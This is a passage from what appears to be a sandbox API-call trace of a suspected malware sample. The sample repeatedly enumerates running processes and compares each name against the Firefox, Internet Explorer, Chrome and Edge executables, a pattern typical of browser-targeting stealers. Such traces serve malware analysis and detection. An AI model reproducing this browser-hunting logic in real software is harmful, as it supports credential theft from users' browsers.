lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0197.774] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0197.774] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0197.774] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0197.774] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0197.774] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.774] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0197.774] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0197.774] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0197.774] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.774] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0197.775] CloseHandle (hObject=0xd4) returned 1 [0197.775] Sleep (dwMilliseconds=0x3e8) [0198.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0198.818] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.818] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0198.818] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0198.818] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0198.818] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0198.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.819] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0198.819] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0198.819] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0198.819] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0198.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.819] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0198.819] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0198.819] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0198.819] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.820] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0198.820] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0198.820] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0198.820] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.821] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0198.821] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0198.821] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0198.821] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.821] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0198.821] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0198.821] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0198.821] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0198.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0198.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0198.822] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.822] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0198.822] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0198.822] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0198.822] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.823] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0198.823] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0198.823] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.824] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.824] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.824] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.824] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.825] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.826] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.827] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0198.827] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0198.827] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0198.827] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.828] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.828] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.828] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.828] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.828] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.829] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0198.829] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0198.829] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0198.829] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.829] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0198.829] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0198.829] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0198.829] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0198.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0198.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0198.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.830] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.830] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.830] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.830] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.831] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0198.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0198.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0198.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0198.832] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0198.832] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0198.832] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0198.832] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0198.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0198.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0198.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0198.833] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0198.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0198.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0198.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0198.833] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0198.834] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0198.834] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0198.834] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0198.834] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0198.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0198.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0198.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0198.834] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0198.835] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0198.835] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0198.835] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0198.835] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.835] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0198.835] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0198.835] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0198.835] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0198.835] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.835] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0198.836] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0198.836] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0198.836] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0198.836] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.836] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0198.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0198.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0198.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0198.837] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.837] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0198.837] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0198.837] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0198.837] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0198.837] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.837] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0198.838] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0198.838] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0198.838] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0198.838] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.838] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0198.838] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0198.838] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0198.838] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0198.838] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.838] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0198.839] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0198.839] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0198.839] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0198.839] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.839] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0198.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0198.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0198.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0198.840] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0198.840] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0198.840] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0198.840] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0198.840] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, 